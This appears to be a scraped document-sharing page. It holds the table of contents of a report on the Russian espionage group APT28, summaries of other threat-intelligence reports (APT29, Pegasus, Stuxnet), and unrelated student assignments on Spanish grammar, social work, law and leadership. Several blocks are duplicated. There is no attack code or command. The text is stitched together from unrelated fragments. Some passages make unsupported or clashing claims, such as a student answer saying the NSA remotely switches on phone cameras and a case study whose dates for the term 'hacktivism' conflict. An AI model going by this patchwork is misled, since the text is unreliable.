APT28:
A WINDOW INTO RUSSIA’S CYBER
ESPIONAGE OPERATIONS?
SPECIAL REPORT
EXECUTIVE SUMMARY, p. 3
APT28 TARGETING REFLECTS RUSSIAN INTERESTS, p. 6
  APT28 Interest in the Caucasus, Particularly Georgia, p. 7
    APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA), p. 8
    APT28 Targeting of the Georgian Ministry of Defense, p. 9
    APT28 Targeting a Journalist Covering the Caucasus, p. 10
    APT28's Other Targets in the Caucasus, p. 11
  APT28 Targeting of Eastern European Governments and Militaries, p. 12
  APT28 Targeting of NATO and Other European Security Organizations, p. 14
  APT28 Targets European Defense Exhibitions, p. 16
  Other APT28 Targets Are Consistent With Nation State Interests, p. 17
APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS, p. 19
  Modular Implants Indicate a Formal Development Environment, p. 24
  APT28 Malware Indicates Russian Speakers in a Russian Time Zone, p. 25
    Compile Times Align with Working Hours in Moscow and St. Petersburg ...
APT 28: Cyber Espionage and the Russian Government? (anupriti)
Russia may be behind a long-standing, careful campaign designed to steal sensitive data relating to governments, militaries and security firms worldwide. This presentation, based on a report made public by FireEye, brings an overview of their opinion. Uploaded here just for general info, to understand how it's all happening!
This white paper analyzes the advanced persistent threat (APT) group known as APT28 or Sofacy. It details their targeting of victims in Ukraine, Spain, Russia, Romania, US and Canada for intelligence gathering. The paper describes the attribution of APT28 to Russian-speaking actors based on compilation times and filenames. It then outlines the scanning process used to find new targets, the multi-stage attack flow to compromise systems, and examples of victims identified from stolen emails including political and aerospace industry targets.
APT29 is a Russian state-sponsored hacking group known as Cozy Bear that has been operating since at least 2008. It is highly sophisticated with extensive operational security and regularly improves its tactics. APT29 targets governments, militaries, think tanks, and other private companies worldwide to conduct cyber espionage in support of Russian government objectives. While no public reports have directly attributed zero-day exploits to APT29, security researchers have warned they actively scan for vulnerabilities as part of their operations.
Russian Cyber Offense Strategy Development (Yuri Livshitz)
This document provides an overview of Russian cyber offense strategy development and capabilities building. It discusses key factors that motivated Russia's selection of cyber offense as a vital tool, including weaknesses in the military after the Soviet Union's dissolution. It outlines General Gerasimov's theory of "hybrid warfare" which emphasizes non-military means for achieving goals and influenced Russia's approach. The document also examines Russia's efforts to build unified cyber offensive networks and cooperate internationally, as well as strategies for resilience in response to potential Western retaliation. Overall, it analyzes the evolution of Russia's cyber capabilities and strategy from both an academic and strategic perspective.
The document summarizes a report from Novetta analyzing the 2014 Sony Pictures Entertainment (SPE) attack. It finds that malware used in the SPE attack is linked to a wider set of malware developed by a group called the Lazarus Group since at least 2009. The Lazarus Group demonstrates a range of technical skills and has targeted various industries, primarily in South Korea and the US. The report aims to profile the Lazarus Group and link the SPE attack to its broader malicious activities.
Presentation of Research. Russia Information Security Market 2009 : Beginning... (LETA IT-company)
LETA IT-company presents its fourth expert report on the information security market: "Information Security Market 2009: Beginning of the Compliance Age". The first report was issued at the beginning of 2007, the second in the middle of 2008 and the third in the middle of 2009, and many of their estimates have since become recognized facts on the IT market.
This research is dedicated to the Russian information security market. It provides information on the market's volume, structure and key players. For the purposes of this research, the IS market means the market of all services, including services that provide information security for the networks, equipment and systems of state and commercial organizations.
It is emphasized that it was not the aim of the authors to cover all segments of the Russian IS market in detail. A number of market segments were therefore left aside, in particular network security and web security. LETA IT-company had to limit the choice of segments because of constrained resources and limited information on certain segments.
Special attention in this research is paid to the problems of personal data protection, the most important issue on the IS market in 2009.
Information for the research was obtained by surveying market participants using the expert interview method and by analyzing publications in the mass media and other public sources. The authors also used public information from the leading research companies: IDC, Gartner, PwC, Ernst & Young and others.
All numerical data represent the expert opinion of journalists, market participants and LETA IT-company's analysts. The research relies on estimates from the most authoritative sources: leading business and specialized mass media, representatives of major companies and others.
Tendencies and forecasts for the IS market are compiled from tendencies and forecasts for the development of the Russian economy in general, the IT market, the Russian and world IS markets, and the estimates and calculations of LETA IT-company's analysts.
A distinctive feature of this research is that it states the names of the articles' authors, which makes it possible for readers to get in touch with them should any questions, proposals or remarks arise.
The Stuxnet Computer Worm: Harbinger of an Emerging Warfare Capability (Yury Chemerkin)
The document summarizes a Congressional Research Service report on the Stuxnet computer worm. It discusses how Stuxnet targeted Iranian nuclear facilities by infecting industrial control systems. It affected systems in several countries and demonstrated that cyber attacks could disrupt critical infrastructure. The report examines questions for Congress about national security, an international treaty on malicious software, and protecting critical infrastructure from cyber threats.
(IT)Cyber Sector - As required by Presidential Policy Directiv.docx (honey725342)
(IT)/Cyber Sector
As required by Presidential Policy Directive 21 (PPD-21), the current version of the National Infrastructure Protection Plan (NIPP 2013, also referred to as the National Plan) provides a unifying structure to define a single program for integrating critical infrastructure and key resources (CI/KR) protection. PPD-21 also assigned a federal agency as the lead Sector-Specific Agency (SSA) for each of the 16 critical infrastructures identified in PPD-21. Each SSA is responsible for developing and implementing an updated Sector-Specific Plan (SSP) for its sector. The original SSPs were published in 2010 based on a Letter of Agreement in the 2009 version of the NIPP, but were updated in 2015. The SSPs detail the application of the NIPP concepts to the unique characteristics and conditions of each sector.
A growing number of hacking incidents and cyber attacks in recent years has raised concerns about the adequacy of the SSP to address major threats or hazards in our IT sector and cyber space. This includes major hacking into credit card records or other IT/data systems at Lockheed Martin (a major defense contractor), RSA (the security division of a major data storage company for financial institutions), SONY, major banking institutions, Target Stores, and even the U.S. State Department. In fact, in 2010 alone, the U.S. government was subject to over 300,000 cyber attacks on its infrastructure. There were also suspicions that hacking into Google e-mail (Gmail) accounts of high-ranking U.S. officials could be traced to China, and the CIA Web site was hacked. Many other incidents have occurred since then. There are also ongoing investigations about Russian hacking into the 2016 Presidential election process.
The IT sector is inextricably linked with the Communications sector, and interdependencies exist with all other CI/KR sectors. Technological advances and rapid development or modernization of a wide variety of systems and processes that depend on a secure IT system, including the Internet and the “cloud,” ensure that IT/cyber security will demand increasing attention in the future. Ensuring IT and cybersecurity is incredibly complex and challenging due to technological complexities and our global interconnectedness, which make it very difficult to detect, deter, trace, defend against, prosecute or counter cyber attacks and hacking.
You and the members of your team should assume the role of senior government officials representing DHS and other federal agencies and entities with responsibilities for ensuring the security of the U.S. IT sector and cyber space. Threats and hazards in this vital CI/KR sector carry potentially enormous consequences to our national economy, to national security and defense, to privacy, and to confidence in our government.
President Trump has asked about the security of our IT sector and cyber space and protection from intentional terrorist or espionage attacks, criminal or malicious hackers ...
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It is marketed for surveillance of serious crimes and terrorism but was found on a leaked list of 50,000 phone numbers belonging to journalists, politicians, activists and others. The Pegasus Project investigation revealed how governments have used the spyware to spy on these groups. NSO claims their technology helps governments fight crime and terrorism.
4. Search the Web for uses of Big Data in homeland security. Specifi.pdf (sktambifortune)
4. Search the Web for uses of Big Data in homeland security. Specifically, read about the spying by the U.S. National Security Agency (NSA). What role did technology and Big Data play in this questionable practice?
Solution
Homeland Security Research Corp. forecast that the big data and data analytics market in Homeland Security and Public Safety will be spearheaded by rapid growth in Asia Pacific and Europe, with CAGR in the low 20s for both regions, especially due to the Chinese and Western European homeland security and public safety markets.
The U.S. National Security Agency spies on the whole world by analyzing data, i.e. data that may come from social media or from any company. The NSA spies on all accounts in as many ways as possible. Recently Snowden revealed information regarding the NSA's secret operations.
He mentioned that the NSA developed a separate search-engine-type algorithm that displays every possible key for the given query. Through these available data they analyzed the suspect. Also, through this search engine they directly connect to our personal devices without our permission.
The main example is that they connect to our personal smartphones without our permission, activate our phone camera and watch what we are doing. This mainly disturbs our personal life.
Albert Helps Protect from Hacking JRN 4.docx (nettletondevon)
Albert Helps Protect from Hacking
JRN 497 Journalism and Mass Communication Capstone
Ceiara Culver
August 18, 2018
Voter security has increased as people get ready for the 2018 midterm elections. Many states have decided to install cyber-intrusion detection systems supplied by Homeland Security. Government officials have created these systems to prevent hacking of the 2018 midterm elections by foreign countries. This comes in response to the 2016 presidential election, during which there were cyber-attacks from Russia (Snow, 2016).
The system that was developed is called Albert. It is similar to Einstein, another Homeland Security program that is an intrusion detection system. Albert is the updated version of this that helps to detect viruses and malware that can affect computers and software. The centers send information through a network that detects whether there is malicious software; if there is, the center issues an alert to be analyzed by security operations (DHS, 2018). According to one government official, the program is a success and it has helped to track many cyber threats. Albert has already detected 50,000 notices of malicious activity. Another person says that Albert may not be a good idea because of the problem of not knowing whether the program is detecting malicious software from foreign countries or tracking people from within the United States, and that the program tracks people from their cellphones, giving away their control. There are also some states that have decided not to go with Albert but with other programs (Marquardt, 2018).
Albert has initiated a lot of mixed feelings in some people. There are those who work for the suppliers of the system and believe it works great and helps protect against hacking from foreign countries like Russia, as happened during the 2016 presidential election, and those who believe that Albert is a way to give up control and may be collecting information from United States citizens instead of foreign countries.
Resources
Marquardt, A. (2018, August 17). States add intrusion sensors to election systems to thwart hacking. CNN. Retrieved from https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
Snow, J. (2016, December 27). Einstein's little bro: Used by most states, Albert guards against malware. FedScoop. Retrieved from https://www.fedscoop.com/ms-isac-einstein-inspired-program-almost-used-by-every-state/
DHS. (2018, May 17). EINSTEIN. Retrieved from https://www.dhs.gov/einstein
This paper presents a framework to automatically detect disinformation campaigns on social media. The framework integrates natural language processing, machine learning, graph analysis, and causal inference. It collects social media posts, identifies narratives, classifies accounts as real or influence operations, maps the network of accounts spreading each narrative, and estimates the causal impact of each account in spreading the narrative. The framework was tested on real Twitter data from the 2017 French election and detected influence operation accounts with 96% precision and 79% recall. It also identified communities and high impact accounts that were corroborated by other sources.
This document discusses cyber crime and cyber security. It begins by defining cyber security as technologies and processes designed to protect computers and data from unauthorized access. Cyber crime is defined as illegal activities committed using computers or networks. The document then provides statistics on cyber crimes in India by state, with the highest rates in Maharashtra and Uttar Pradesh. It also ranks the top countries for cyber crimes in 2016, with the US ranked first and Vietnam ranked last. China is identified as the top hacking country in 2016. The most common type of cyber attack is viruses, while financial fraud is the least common. The document concludes by providing tips for protecting against cyber crimes such as using firewalls and strong passwords.
On How the Darknet and its Access to SCADA is a Threat to National Critical I... (Matthew Kurnava)
This document analyzes how the darknet poses a threat to national critical infrastructure. It begins with an introduction that defines the darknet and describes some of the illegal activities that occur there. The research question asks how the darknet threatens critical infrastructure and how vulnerable different sectors are. The hypothesis is that the darknet poses a primary threat to US cyber critical infrastructure due to criminal, hacktivist, and terrorist use that could significantly damage health and welfare. A literature review discusses research on darknet cyber attacks, hacktivist and terrorist groups using the darknet, and critical infrastructure's growing dependency on technology and vulnerability. The methodology will use an analytical approach to examine threats to each of the 16 US critical infrastructure sectors.
Case Study - Cyberterrorism - A New Reality - When hackers claiming .docx (cowinhelen)
Case Study - Cyberterrorism—A New Reality:
When hackers claiming to support the Syrian regime of Bashar Al-Assad attacked and disabled the website of Al Jazeera, the Qatar-based satellite news channel, in September 2012, the act was another act of hacktivism, purporting to promote a specific political agenda over another. Hacktivism has become a very visible form of expressing dissent. Even though there have been numerous incidents reported by the media, the first case of hacktivism was documented in 1989 when a member of the Cult of the Dead Cow hacker collective named Omega coined the term in 1996. However, hacktivism is not the only form of cyber protest and conflict that has everyone from ICT professionals to governments scrambling for solutions. Individuals, enterprises, and governments alike rely in many instances almost completely on network computing technologies, including cloud computing. The international and ever-evolving nature of the Internet along with inadequate law enforcement and the anonymity the global architecture offers creates opportunities for hackers to attack vulnerable nodes for personal, financial, or political gain.
The Internet is also rapidly becoming the political and advocacy platform of choice, bringing with it both positive and negative consequences. Increasingly sophisticated off-the-shelf technologies and easy access to the Internet are significantly increasing incidents of cyberterrorism, netwars, and cyberwarfare. The following are a few examples.
• According to The Israel Electric Company, Israel is attacked 1,000 times a minute by cyberterrorists targeting the country's infrastructure: water, electricity, communications, and other services.
• The New York Times, quoting military officials, said there was a seventeen-fold increase in cyberattacks targeting the US critical infrastructure between 2009 and 2011.
• The 2010 Data Breach Investigations Report has data recording more than 900 instances of computer hacking and other data breaches in the past seven years, resulting in some 900 million compromised records. In 2012, the same study listed 855 breaches, resulting in 174 million compromised records in 2011 alone, up from 4 million in 2010.
• Another study of 49 breaches in 2011 reported that the average organizational cost of a data breach (including detection, internal response, notification, and post-notification cost) was $5.5 million. This number was down from $7.2 million in 2010.
• The Telegraph (London) reported that "India blamed a new 'cyber-jihad' by Pakistani militant groups for the exodus of thousands of people from India's north-eastern minorities from its main southern cities in August after text messages warning them to flee went viral."
There have been recorded instances of nations allegedly engaging in cyberwarfare. The Center for the Study of Technology and Society has identified five methods by which cyberwarfare can be used as a means of military action. These include defacing or di.
This document is a report from Comodo Threat Research Labs summarizing malware trends in 2017. It finds that trojans were the most common malware type, making up 41% of detections, followed by applications at 24.7% and backdoors at 10.1%. Russia and the US had the most malware detections. The report analyzes trends in specific malware types like trojans, applications, backdoors, and worms. It also examines detections by country and region. Comodo predicts backdoor detections will continue rising in Q1 2018 based on a rise seen in Q4 2017.
TOTEM: Threat Observation, Tracking, and Evaluation Model (John Gerber)
Merriam-Webster defines a totem as any supposed entity that watches over or assists a group of people, such as a family, clan, or tribe. In this presentation I will focus on how TOTEM assists in watching over and evaluating the threat an IP represents. The idea behind TOTEM is simple: compare threat information from sources such as watchlists (DShield, Emerging Threats, SenderBase, etc.) to activities with the organization (IDS/IPS, flow logs, etc.) and other locations (SANS ISC, DOE federated model, etc.). As new threat information and activity sources are added, a better evaluation can be rendered.
Project 4 Threat Analysis and ExploitationTranscript (backgroun.docxstilliegeorgiana
Project 4: Threat Analysis and Exploitation
Transcript (background):
You are part of a collaborative team that was created to address cyber threats and exploitation of US financial systems critical infrastructure. Your team has been assembled by the White House Cyber National Security staff to provide situational awareness about a current network breach and cyber attack against several financial service institutions. Your team consists of four roles: a representative from the financial services sector who has discovered the network breach and the cyber attacks (these attacks include distributed denial of service (DDoS) attacks, web defacements, sensitive data exfiltration, and other attack vectors typical of this nation state actor); a representative from law enforcement who has provided additional evidence of network attacks found using network defense tools; a representative from the intelligence agency who has identified the nation state actor from numerous public and government-provided threat intelligence reports and will provide threat intelligence on the tools, techniques, and procedures of this nation state actor; and a representative from the Department of Homeland Security who will provide the risk, response, and recovery actions taken as a result of this cyber threat. Your team will have to provide education and security awareness to the financial services sector about the threats, vulnerabilities, risks, and the risk mitigation and remediation procedures to be implemented to maintain a robust security posture. Finally, your team will take the lessons learned from this cyber incident and share that knowledge with the rest of the cyber threat analysis community. At the end of the response to this cyber incident, your team will provide two deliverables: a situational analysis report (SAR) to the White House Cyber National Security staff, and an After Action Report and lessons learned to the cyber threat analyst community.
Step 2: Assessing Suspicious Activity
Your team is assembled and you have a plan. It's time to get to work. You have a suite of tools at your disposal from your work in Project 1, Project 2, and Project 3, which can be used together to create a full common operating picture of the cyber threats and vulnerabilities that are facing the US critical infrastructure.
To be completed by all team members: Leverage the network security skills of using port scans, network scanning tools, and analyzing Wireshark files, to assess any suspicious network activity and network vulnerabilities.
Step 3: The Financial Sector
To be completed by the Financial Services Representative: Provide a description of the impact the threat would have on the financial services sector. These impact statements can include the loss of control of the systems, the loss of data integrity or confidentiality, exfiltration of data, or something else. Also provide impact assessments as a result of this security incident to the financial ...
This document proposes five core primitives that are building blocks for Networks of 'Things' (NoTs), including the Internet of Things (IoT):
1) Sensors - which measure physical properties and output data
2) Aggregators - which collect and process data from multiple sensors
3) Communication channels - which allow for data transfer between primitives
4) External utilities (eUtilities) - which are entities outside the NoT that can input or output data
5) Decision triggers - which initiate actions based on aggregated data
These primitives provide a framework for analyzing reliability, security, and trust in NoTs.
7122017 cyber espionage is alive and well apt32 and the thrsmile790243
FireEye analyzed cyber espionage activities of APT32, a threat group believed to be operating out of Vietnam. APT32 has targeted private companies with business interests in Vietnam as well as foreign governments and dissidents since at least 2014. APT32 uses phishing emails with malicious attachments or links to infect victims and install backdoors on their systems. These backdoors include unique malware families as well as commercially available tools and communicate with command and control servers controlled by APT32. FireEye investigated multiple intrusions attributed to APT32 and outlined their targeting and sophisticated tactics.
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It provides full access to a targeted phone's data, communications, and sensors. An investigation revealed that governments used Pegasus to spy on journalists, politicians, activists and others. Over 50,000 phone numbers on a leaked list were analyzed, with many showing forensic evidence of Pegasus infection, indicating illegal surveillance. In India, it was alleged that the government used Pegasus to spy on WhatsApp messages of activists and politicians, and numbers linked to a Supreme Court case accusing the former Chief Justice of sexual harassment were also reportedly targeted.
Learning ResourcesRequired ReadingsToseland, R. W., & Ri.docxfestockton
Learning Resources
Required Readings
Toseland, R. W., & Rivas, R. F. (2017). An introduction to group work practice (8th ed.). Boston, MA: Pearson.
Chapter 11, “Task Groups: Foundation Methods” (pp. 336–363)
Chapter 12, “Task Groups: Specialized Methods” (pp. 364–395)
Van Velsor, P. (2009). Task groups in the school setting: Promoting children’s social and emotional learning. Journal for Specialists in Group Work, 34(3), 276–292.
Document:
Group Wiki Project Guidelines (PDF)
Recommended Resources
Holosko, M. J., Dulmus, C. N., & Sowers, K. M. (2013). Social work practice with individuals and families: Evidence-informed assessments and interventions. Hoboken, NJ: John Wiley & Sons, Inc.
Chapter 1 “Assessment of Children”
Chapter 2 “Intervention with Children”
Discussion: Task Groups
Group work is a commonly used method within school settings. Because peer interaction is important in the emotional and social development of children, the task group can serve as a wonderful therapeutic setting and tool; however, many factors should be considered when implementing this type of intervention.
For this Discussion, read the Van Velsor (2009) article.
By Day 3, post your understanding of task groups as an intervention for children. Use the model for effective problem solving to compare and contrast (how to identify the problem, develop goals, collect data). How does this model differ from a traditional treatment group? What are the advantages and possible disadvantages of this model? Describe how you might use this model for adults. What populations would most benefit from this model?
LeamosEscribamos Completa el párrafo con las formas correctas de lo.docxfestockton
Let’s Read/Let’s Write: Complete the paragraph with the correct forms of the verbs in parentheses. Use the preterite or the imperfect.
I __1__ (criarse) in the countryside, but my family __2__ (mudarse) to the city when I was twelve years old. We spoke Aymara in my village, and my mother did not __3__ (expresarse) well in Spanish. My siblings and I __4__ (comunicarse) without any problem because we had studied Spanish at school. With difficulty we __5__ (acostumbrarse) to the way of life. I __6__ (preocuparse) about everything. I did not __7__ (gustar) the noise of the cars. But little by little, we __8__ (asimilar) the ways of the people of the city. I __9__ (graduarse) from the university recently, my older brother is now an architect, and my younger brother __10__ (casarse) last month.
Leadership via vision is necessary for success. Discuss in detail .docxfestockton
Leadership via "vision" is necessary for success. Discuss in detail the qualities that a leader must exhibit in order to be considered visionary and, further, how these qualities may be learned and developed. Provide research and share insight on the determination of a specific leadership theory associated with leadership via vision. Cite your posting in proper APA format and ensure that your posting provides a minimum of 5 paragraphs.
Learning about Language by Observing and ListeningThe real.docxfestockton
Learning about Language by Observing and Listening
The real voyage of discovery consists not in seeking
new landscapes, but in having new eyes. Marcel Proust
The UCSD experience encompasses academic as well as social learning. Therefore, we learn not only from our courses, but from the people we meet on campus and the experiences we have with them. Life is a journey of self-discovery. As individuals, we are constantly seeking to determine who we are and where we belong in the world. Throughout this process, language is both a bridge and a barrier to communication and human growth.
The general subject matter for this essay is language or language communities. The source of your information will be what you observe and hear by listening to others. The goal is to do a project based on what our own minds can comprehend from diligent observation, note-taking, and reasoning. You should arrive at a reasoned (not emotional) conclusion. The conclusion/result of your experiment is your thesis and should be presented in the opening paragraph in one sentence. Secondary material should not be brought into this essay. Thus, this is not an essay that needs to be the result of academic texts or online sources. The research is what you see and how you interpret what you see and hear. It will be up to you to determine what particular focus your essay will take and what meaning you wish to convey to your reader. Do the exploratory writing activities on pages 73-76. These activities will guide you through an analysis of some of the reflections you completed in the first part of your book. Once you determine your focus, you will use the information you have already gathered and additional information you will research to clarify your ideas and provide evidence for the points you wish to make.
If you prefer a more direct prompt, the suggested topics listed below might be helpful to you. Choose one of the following topics to establish a focus and direction.
1) From your observations and conversations, what assumptions and stereotypes do we make about people based on language and behavior? What did you learn from the experiment?
2) You may examine body language as well as verbal language. Explore nonverbal communication in a group. What conclusions can you come to regarding the group based on nonverbal behavior?
3) Did you observe language differences between men and women here at UCSD? Notice the ways in which men and women treat one another. Observe the language you hear on campus.
How do women greet one another? How do men greet each other? Do not just note the similarities or differences. Explain and interpret the information.
4) Observe and identify a code language on campus, on your job, or in your personal arena. How is language used? Is it effective? Analyze.
5) Have you become keenly aware of code switching? Who utilizes this language? In your observations and conversations, did you find code switching to be an acceptable form of lang.
Learning Accomplishment Profile-Diagnostic Spanish Language Edit.docxfestockton
Learning Accomplishment Profile-Diagnostic Spanish Language Edition
The Ages and Stages Questionnaires-Social Emotional (ASQ-SE)
Learning Accomplishment Profile-3 (LAP-3)
Mullen Scales of Early Learning
Purpose of the screening-what can an early childhood professional do with the results? What should happen next?
LEARNING OUTCOMES1. Have knowledge and understanding of the pri.docxfestockton
LEARNING OUTCOMES:
1. Have knowledge and understanding of the principles of Constitutional and Administrative Law, and of the way in which these principles have developed.
2. Deal with issues relating to Constitutional and Administrative Law both systematically and creatively, recognising potential alternative conclusions for particular situations and providing supporting reasons for such conclusions.
3. Demonstrate self-direction and originality in tackling and solving problems relating to Constitutional and Administrative Law.
4. Research primary and secondary sources of Constitutional and Administrative Law.
5. Communicate thoughts and ideas in writing and/or orally, using the English language and legal terminology with care, clarity and accuracy.
6. Manage time effectively.
QUESTION:
A recently elected Government, concerned about rising gun crime by drug dealers, has introduced a Bill into Parliament to bring back the death penalty for any person convicted of causing death by the use of a firearm where the offence is also related to an illegal drug trade.
Human Rights UK (HRUK), part of a worldwide protest organisation called ‘Global Human Rights’ is opposed to the death penalty in any circumstances. HRUK has many thousands of members across the UK. The organisation is split into county groups and there is a thriving branch of over 1200 members in Penfield.
Sam Jones, the leader of the Penfield branch, has proposed a local demonstration against the Bill to take place on 1st May 2014. The demonstration includes a march from the Town Hall in Penfield City Centre to the local War Memorial followed by speeches from senior members of the organisation.
The Chief Constable of Penfield Police, having been informed of the proposed protest, is concerned about rumours that a small counter protest has been organised to disrupt the protest by a far right group opposed to human rights. He has issued a Notice to HRUK and Sam Jones under the Public Order Act 1986 which imposes the following conditions on the HRUK demonstration planned for 1st May 2014:
Notice from the Chief Constable of Penfield Police:
1) any demonstration to be held by the HRUK between 1st March 2014 and 1st October 2014 should be held in Penfield Country Park, at least 25 miles from Penfield City Centre;
2) the maximum number of demonstrators shall be 25;
3) the maximum duration of the demonstration shall be 2 hours;
4) there should be no public speeches and;
5) that in the event of any counter demonstration or hostility shown towards HRUK members, the Penfield Police reserve the right to cancel the demonstration immediately.
Advise, giving reasons, whether Sam Jones and/or HRUK can use the Human Rights Act 1998 to challenge the decision of the Chief Constable.
Leadership Style What do people do when they are leadingAssignme.docxfestockton
Leadership Style: What do people do when they are leading?
Assignment: Leadership Style: What Do People Do When They Are Leading?
Due Week 9 and worth 100 points
Choose one (1) of the following CEOs for this assignment: Ursula Burns (Xerox). Use the Internet to investigate the leadership style and effectiveness of the selected CEO.
Write a five to six (5-6) page paper in which you:
Provide a brief (one [1] paragraph) background of the CEO.
Analyze the CEO’s leadership style and philosophy, and how the CEO’s leadership style aligns with the culture.
Examine the CEO’s personal and organizational values.
Evaluate how the values of the CEO are likely to influence ethical behavior within the organization.
Determine the CEO’s three (3) greatest strengths and three (3) greatest weaknesses.
Select the quality that you believe contributes most to this leader’s success. Support your reasoning.
Assess how communication and collaboration, and power and politics influence group (i.e., the organization’s) dynamics.
Use at least five (5) quality academic resources in this assignment. Note: Wikipedia and other Websites do not qualify as academic resources.
Your assignment must follow these formatting requirements:
Be typed, double spaced, using Times New Roman font (size 12), with one-inch margins on all sides; citations and references must follow APA or school-specific format. Check with your professor for any additional instructions.
Include a cover page containing the title of the assignment, the student’s name, the professor’s name, the course title, and the date. The cover page and the reference page are not included in the required assignment page length.
The specific course learning outcomes associated with this assignment are:
Analyze the formation and dynamics of group behavior and work teams, including the application of power in groups.
Outline various individual and group decision-making processes and key factors affecting these processes.
Examine the primary conflict levels within an organization and the process for negotiating resolutions.
Examine how power and influence empower and affect office politics, political interpretations, and political behavior.
Use technology and information resources to research issues in organizational behavior.
Write clearly and concisely about organizational behavior using proper writing me
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It is marketed for surveillance of serious crimes and terrorism but was found on a leaked list of 50,000 phone numbers belonging to journalists, politicians, activists and others. The Pegasus Project investigation revealed how governments have used the spyware to spy on these groups. NSO claims their technology helps governments fight crime and terrorism.
4. Search the Web for uses of Big Data in homeland security. Specifi.pdfsktambifortune
4. Search the Web for uses of Big Data in homeland security. Specifically, read about the spying by the U.S. National Security Agency (NSA). What role did technology and Big Data play in this questionable practice?
Solution
Homeland Security Research Corp. forecast that the big data and data analytics in Homeland Security and Public Safety market will be spearheaded by rapid growth in Asia Pacific and Europe, with CAGR in the low 20s for both regions, especially due to the Chinese and Western European homeland security and public safety markets.
The U.S. National Security Agency spies on the whole world by analyzing data, i.e. data that may come from social media or from any company. The NSA spies on all accounts in as many ways as possible. Recently Snowden revealed information regarding the NSA’s secret operations.
He mentioned that the NSA developed a separate search-engine-type algorithm that displays every possible key for the given query. Through this available data they analyzed the suspect. And also through this search engine they directly connect to our personal devices without our permission.
The main example is that they connect to our personal smartphone without our permission, activate our phone camera and watch what we are doing. This mainly disturbs our personal life.
Albert Helps Protect from Hacking JRN 4.docxnettletondevon
Albert Helps Protect from Hacking
JRN 497 Journalism and Mass Communication Capstone
Ceiara Culver
August 18, 2018
Voter security has increased as people get ready for the 2018 midterm elections. Many states have decided to install cyber-intrusion systems supplied by Homeland Security. Government officials have created these systems to prevent hacking during the 2018 midterm elections by foreign countries. This comes in response to the 2016 presidential election, where there were cyber-attacks from Russia (Snow, 2016).
The system that was developed is called Albert. It is similar to another program called Einstein, which is another Homeland Security program that is an intrusion detection system. Albert is the updated version of this that helps to detect viruses and malware that can affect computers and software. The centers send information through a network that detects if there is malicious software; if there is, the center gives out an alert to be analyzed by security operations (DHS, 2018). According to one government official, the program is a success and it has helped to track many cyber threats. Albert has already detected 50,000 notices of malicious activity. Another person says that Albert may not be a good idea because of the problem of not knowing if the program is detecting malicious software from foreign countries or if it is tracking people from within the United States, and that the program tracks people through their cellphones, giving away their control. There are also some states that have decided not to go with Albert but with other programs (Marquardt, 2018).
Albert has initiated a lot of mixed feelings in some people. There are those that work for the suppliers of the system who believe it works great and helps protect against hacking from foreign countries like Russia during the 2016 presidential election, and those who believe that Albert is a way to give up control and can be getting information from United States citizens instead of foreign countries.
Resources
Marquardt, A. (2018, August 17). States add intrusion sensors to election systems to thwart hacking. Retrieved from https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
Snow, J. (2016, December 27). Einstein's little bro: Used by most states, Albert guards against malware. Retrieved from https://www.fedscoop.com/ms-isac-einstein-inspired-program-almost-used-by-every-state/
EINSTEIN. (2018, May 17). Retrieved from https://www.dhs.gov/einstein
This paper presents a framework to automatically detect disinformation campaigns on social media. The framework integrates natural language processing, machine learning, graph analysis, and causal inference. It collects social media posts, identifies narratives, classifies accounts as real or influence operations, maps the network of accounts spreading each narrative, and estimates the causal impact of each account in spreading the narrative. The framework was tested on real Twitter data from the 2017 French election and detected influence operation accounts with 96% precision and 79% recall. It also identified communities and high impact accounts that were corroborated by other sources.
This document discusses cyber crime and cyber security. It begins by defining cyber security as technologies and processes designed to protect computers and data from unauthorized access. Cyber crime is defined as illegal activities committed using computers or networks. The document then provides statistics on cyber crimes in India by state, with the highest rates in Maharashtra and Uttar Pradesh. It also ranks the top countries for cyber crimes in 2016, with the US ranked first and Vietnam ranked last. China is identified as the top hacking country in 2016. The most common type of cyber attack is viruses, while financial fraud is the least common. The document concludes by providing tips for protecting against cyber crimes such as using firewalls and strong passwords.
On How the Darknet and its Access to SCADA is a Threat to National Critical I...Matthew Kurnava
This document analyzes how the darknet poses a threat to national critical infrastructure. It begins with an introduction that defines the darknet and describes some of the illegal activities that occur there. The research question asks how the darknet threatens critical infrastructure and how vulnerable different sectors are. The hypothesis is that the darknet poses a primary threat to US cyber critical infrastructure due to criminal, hacktivist, and terrorist use that could significantly damage health and welfare. A literature review discusses research on darknet cyber attacks, hacktivist and terrorist groups using the darknet, and critical infrastructure's growing dependency on technology and vulnerability. The methodology will use an analytical approach to examine threats to each of the 16 US critical infrastructure sectors.
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It provides full access to a targeted phone's data, communications, and sensors. An investigation revealed that governments used Pegasus to spy on journalists, politicians, activists and others. Over 50,000 phone numbers on a leaked list were analyzed, with many showing forensic evidence of Pegasus infection, indicating illegal surveillance. In India, it was alleged that the government used Pegasus to spy on WhatsApp messages of activists and politicians, and numbers linked to a Supreme Court case accusing the former Chief Justice of sexual harassment were also reportedly targeted.
Similar to APT28 A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS.docx (14)
APT28 A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS.docx
1. APT28:
A WINDOW INTO RUSSIA’S CYBER
ESPIONAGE OPERATIONS?
SPECIAL REPORT
SECURITY
REIMAGINED
2 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
CONTENTS

EXECUTIVE SUMMARY ... 3
APT28 TARGETING REFLECTS RUSSIAN INTERESTS ... 6
   APT28 Interest in the Caucasus, Particularly Georgia ... 7
   APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA) ... 8
   APT28 Targeting of the Georgian Ministry of Defense ... 9
   APT28 Targeting a Journalist Covering the Caucasus ... 10
   APT28’s Other Targets in the Caucasus ... 11
   APT28 Targeting of Eastern European Governments and Militaries ... 12
   APT28 Targeting of NATO and Other European Security Organizations ... 14
   APT28 Targets European Defense Exhibitions ... 16
   Other APT28 Targets Are Consistent With Nation State Interests ... 17
APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS ... 19
   Modular Implants Indicate a Formal Development Environment ... 24
